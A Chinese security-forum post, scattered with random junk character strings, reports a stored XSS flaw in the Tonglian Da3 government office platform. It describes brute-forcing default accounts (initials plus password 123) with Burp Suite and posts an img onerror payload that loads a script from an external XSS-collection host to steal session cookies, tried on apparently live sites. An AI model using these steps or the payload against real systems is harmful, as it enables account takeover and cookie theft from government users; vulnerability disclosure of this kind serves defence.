+ s2 d4 I2 y- {2 b" M, |0 O
- ^8 L; i9 {+ S% t H0 w 同联Da3协同办公平台后台通用储存型xss漏洞! a+ r8 _+ |% J
4 ^6 ^( ^% [, h) d) r% p: a1 s, t
9 B y7 v& R' h. t j$ Q- |& U0 K 平台简介: E& S8 R0 {! {2 `! D; m' x) g
0 P, i# r( Y* B4 i
5 Q' X1 j D* w( t6 U% ^2 z/ ~ . a* f. G1 n5 w
+ k% U$ o0 v) A9 A. z $ E2 G" z5 y2 }9 Y! n
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# ~$ t: r' v' P同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
# f: _( M( P+ n0 J; i) \同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
* z* n# p7 l) }& b' n+ T* i% O
9 t, ?3 U; S+ Q u
A4 ?6 m' J$ N. d, L7 m" f
& ?' |$ ]% \ J3 F* Z# d3 w j( g* q
# p: L, p0 X4 o4 q; |
$ d7 J. _& z' c3 b4 Q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 b8 g j: {+ j: s4 {. V2 @5 x
" N( \) @% D% f1 ` 1 ?* }) H+ V& I, D- }9 w0 B0 G1 a
! \$ |) x- J+ _' d2 w& }
* q$ b' e0 }: H( R" P7 Z
6 F ]4 ^9 t( W1 O% C http://1.1.1.1:7197/cap-aco/#(案例2-)2 L) P# F: r3 |! h3 p& H( r
\: c1 y6 X; o4 D 4 |2 H# u i. U4 y# `/ k3 k
http://www.XXOO.com (案例1-官网网站)
/ @" n8 N1 R" Q/ ~0 U* ~
6 Z* M$ `2 z2 x5 x9 b8 Y3 M: s6 H
% ], y9 x/ e' s N O2 E$ v 漏洞详情:
# m! w& a# d, f6 \' l
. N+ G( g) T% ^# x3 E7 d 9 D' p: h6 W/ A1 k
案例一、
& ^4 u4 }" \$ Q6 l
4 _. d6 @0 Y- K8 h: K: c" j * B/ g: L% w& m2 W' g5 B# H
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% z4 }/ S( _, E) }4 h* o
: X& S) O! H& o* [* J- L1 T $ w& N! P# |2 W7 R4 H6 n7 C
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# [( l* K. z0 ?0 q5 \
' y }5 M$ O" M! C 1 J7 h# P/ r- A# ]* X+ o
3 K$ @* E* D3 Q; Z% P
% _; U: v7 T3 R4 ^! S
9 H) P2 M' c3 O y
+ e% z5 l: V! h' Z
: G! m8 B r% B5 @) e" P: u ! h7 _4 v# \/ o8 |6 P# g
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
4 m [- ~6 I2 i- F3 N3 a
. p7 n0 j7 W7 I: A! _
7 ^% t \9 m8 @6 ^: @
2 M8 @1 Z+ @" p% {# {4 I6 a: Y2 Z- ^
1 t9 p0 @2 d- P# ], [( I4 m/ h
9 o5 ]& Z/ G" A( \0 N 
& J1 V; S' Z: t( b8 W( N
- A( m7 ]7 o) o1 o
9 y# H6 v, B; \, g% j7 S1 l 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
" f0 `- W1 j2 h, |0 w: d: y
* Z3 z0 g# d; }! l+ @
' ?* r5 G/ ?; s- O
- u5 V. w0 [+ }: d+ A6 k
, k9 n4 o2 R8 {* m $ j, a6 C7 |& [2 I* L E
<img src=x, H3 g1 O3 @& z) h3 N) i( l1 t
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ' K+ {0 J# e& [
# j9 V# M9 R) y1 k. o' H6 e! B
4 x) }$ O Z E: X1 w
3 T: V8 j" N, ?! \
% w4 e f" `6 ^( v, }5 y$ A 4 e" z% `$ I$ I, L/ W- \+ a# |
然后发送,接收cookie如图: ) \, X9 c9 @' ?# e* Z( i! p
6 p; h" d3 H8 q9 J, L6 `& J1 l$ x2 a/ y
# d. J. L% ~* [ T& c3 d + Y; J6 m) w6 y1 [, m3 L9 N/ |6 v) X- V
2 z3 z2 O) V% J \( {4 V: p3 B% n1 g
: p8 D0 n2 \/ {6 ~ R / e# R$ X. Y7 w
- d; [5 S6 ?2 \; k, _* h" Q
" f# i9 g/ Y& O {& u( y) j) h& Q. P
3 Z$ _: z+ }+ h( |9 X- h
9 s0 v: @0 K' j [
' y, r: O7 s5 | * q2 n3 \4 `# j/ E7 m' S8 K
# H" _5 G4 [0 [8 q
6 J: [% n: T3 v0 N. B 
1 m, u9 B0 ~% I4 a5 H, t
; _% v, m# Z" Q; q
7 z. {) s6 `+ m& B- J 
7 Z: O' G0 D- T& c# S# R% r# y
; h) E2 q x' s: d% A % e' n% ]4 G' E) v# p7 P. S
+ \# [& O4 U9 F# X5 ~
, J! Z" H& J1 ^% t! e. x$ s R
+ i" G# s1 P, Z6 j/ M
案例2、 5 N C2 A$ t6 D& @' k. c
/ F, D: q9 C: {' c Y0 X- P
6 J( ?9 G/ b0 P8 m8 ~: I+ Z 前面步骤都一样,下面看效果图: + `, d( _6 \0 W* N2 F, R6 q4 D4 M
0 @$ _* v) m% A( e% d1 S: U
8 `0 j1 c- G5 g 
5 A+ n T4 j* i/ F" {/ |9 l3 J
" L8 Q# k& u: D8 K0 B( A5 }8 o8 G
1 o2 `6 J$ ^$ `- e) k 
+ l0 `' @+ [* T
S9 _# t& s3 ~& o m4 Q3 O
8 H1 R' U, g4 u* C
7 Y8 ]8 e$ S( p/ V/ g7 j% b* Q8 j
, d P c9 x& x$ `) D: W: g
+ I8 J' K7 `* Z" g# s( y . }& f/ p2 q) |+ l! \3 H9 A5 {3 e
+ H9 w+ E$ l* A: S% O 2 x' |9 _# s% b8 B
' G9 ^6 @7 t4 d' }0 z
0 u, h; f$ S2 E/ ?
& ~% N0 @: W7 C, X' I) z
% v4 X5 `' A4 Z i! W e
; o& u1 Z% Q, C( z0 Q: F
% H2 |2 r( G3 \: g& A . H# h- R' [' c' L
6 \* ^7 A) X* z- t. @* b U
% k+ Y e& k: d* o4 R, u
( s4 T$ S; L. u, ~* a2 b5 T
0 J; ^# |* [9 z3 M : K( d1 u4 Y3 Z$ }7 o \& X" J& y
/ {+ O5 u$ `; E9 ~) Q' J
6 R) p) y) j- x! D; A7 I. S 
发表于 2018-10-20 20:14:15
收藏
支持
反对